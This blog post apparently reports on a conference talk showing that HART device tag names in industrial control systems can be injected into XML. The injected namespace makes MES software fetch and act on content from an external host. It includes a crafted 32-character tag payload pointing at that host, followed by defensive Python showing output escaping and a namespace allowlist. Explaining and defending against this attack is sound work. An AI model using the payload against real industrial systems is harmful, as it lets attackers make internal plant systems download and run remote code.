At the S4x14 conference in Miami this past week, Alexander Bolshev of ERPScan gave a presentation on his work on the Highway Addressable Remote Transducer protocol (HART). HART is a commonly used industrial protocol that runs over legacy 4-20 mA signaling (a digital signal superimposed on the analog current loop), what non-controls people call “copper wire”. It has TCP/IP extensions as well, and Alexander covers those in the presentation too, but the main focus is on the device-level network using the 4-20 mA loop.

In order to test his theories, Alexander built an Arduino shield that interfaces to the HART bus and allows sniffing and communication over the bus. Pretty clever. His schematics and code are up at https://github.com/Darkkey, and slides are here.

The ICS community has known for a while that HART is an insecure-by-design protocol. It has always been assumed that if an attacker had access to the HART bus/network, they would be able to perform a lot of interesting attacks directly against HART devices, including jamming, data injection, and fuzzing of the master station. Alexander shows this, and then does one better by showing how the data path from the HART device up to the Manufacturing Execution System (MES) can be used to perform actions or compromise systems on the control system network, or even on the corporate network.

This data path involves a link between data provided over the HART network and a common IT mechanism, XML namespaces. In his presentation, he discusses how HART long tag names (the 32-character device names) are translated into XML and eventually displayed in a specific piece of HART engineering software or transferred to an enterprise process-management system.

Most control system engineers have zero idea of what XML namespaces are, and even less about how they are used in systems they may interact with. I actually had to go to Matthew Strom, a web developer who works in my building, to get an explanation of XML tags and vulnerabilities.

Basically, Alexander puts a device with a specially crafted name on the HART network. In his example case, the XML generated from it ends up containing an xmlns="x-scheme:http://123q.ru" attribute. Strictly speaking, a namespace URI is only an identifier and a conforming XML parser should never dereference it, but the consuming software in the demo treats it as the place to fetch instructions on how to interpret the document. It dutifully goes to http://123q.ru to download the malicious schema, and takes action based on what it downloaded.

That’s right, using a HART-based delivery mechanism, a malicious individual could instruct an internal system to go out to an external website, download code, and run it.
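To make the injection concrete, here is a small added example (not code from the talk or from any HART product) showing how an unescaped device tag turns into an attacker-controlled namespace declaration, and the two places to stop it: escape on output, and reject unexpected namespace declarations on input. The export element names, the urn:example:hart-export namespace and the exact framing of the 32-character tag are assumptions made for the illustration; only the namespace URI comes from the slides.

```python
import io
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

# Constructed payload for illustration (not the exact string from the talk).
# HART long tags are 32 characters; this one is exactly 32. The template below
# opens the attribute with name=" and closes it with ", so the leading quote in
# the tag terminates the attribute early and the remainder becomes a new
# default-namespace declaration carrying the URI shown on Bolshev's slide.
MALICIOUS_TAG = '" xmlns="x-scheme:http://123q.ru'

# Namespace the hypothetical export format is allowed to use (an assumption).
EXPECTED_NAMESPACES = {"urn:example:hart-export"}


def render_naive(tag, pv):
    """Vulnerable: the device tag is formatted straight into an attribute."""
    return ('<HartExport xmlns="urn:example:hart-export">'
            '<Device name="%s"><PV>%s</PV></Device></HartExport>' % (tag, pv))


def render_safe(tag, pv):
    """Hardened: quoteattr() escapes quotes, &, < and > so the tag stays data."""
    return ('<HartExport xmlns="urn:example:hart-export">'
            '<Device name=%s><PV>%s</PV></Device></HartExport>'
            % (quoteattr(tag), pv))


def declared_namespaces(xml_text):
    """All namespace URIs declared anywhere in the document, used or not."""
    events = ET.iterparse(io.BytesIO(xml_text.encode("utf-8")),
                          events=("start-ns",))
    return {uri for _event, (_prefix, uri) in events}


def unexpected_namespaces(xml_text, allowed=frozenset(EXPECTED_NAMESPACES)):
    """Consumer-side check: namespace URIs the export format does not define.
    A non-empty result means the document should be rejected before any
    downstream component gets the chance to treat the URI as a URL to fetch."""
    return declared_namespaces(xml_text) - set(allowed)


def device_name(xml_text):
    """What a consumer reads back as the device's name (first child of root)."""
    root = ET.fromstring(xml_text)
    return root[0].get("name")


if __name__ == "__main__":
    for label, render in (("naive", render_naive), ("safe", render_safe)):
        doc = render(MALICIOUS_TAG, 12.5)
        print(label, "->", doc)
        print("  name read back:", repr(device_name(doc)))
        print("  unexpected namespaces:", unexpected_namespaces(doc))
```

With the naive renderer the device name read back is empty and the document declares x-scheme:http://123q.ru as a namespace; with quoteattr() the whole 32-character string survives as the name and no foreign namespace appears. The allowlist check belongs on the consuming side (the engineering tool or MES import) as a second line of defence, since the device, the gateway and the export code are often from three different vendors.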

Even worse, Alexander notes that industrial systems may not get patches for components that are typically considered ‘internet’ related, so the exploit might be as simple as getting the system to navigate to the website. In fact, in his slides, the User-Agent string in the outbound request corresponds to an extremely old version of Internet Explorer, one with a long list of known vulnerabilities. The browser component was likely embedded as an object in the MES application and never updated, because nobody considered that it could be co-opted this way.

So, what’s the important takeaway? Control systems can use IT interfaces under the hood for important processing, and vulnerabilities in those under-the-hood components can be used in surprising and interesting ways to get malicious code in, or important data out.

Let’s see if we can get DNS tunneling working from the HART bus next.

image by Hryck.
title totally stolen from @ChrisSistrunk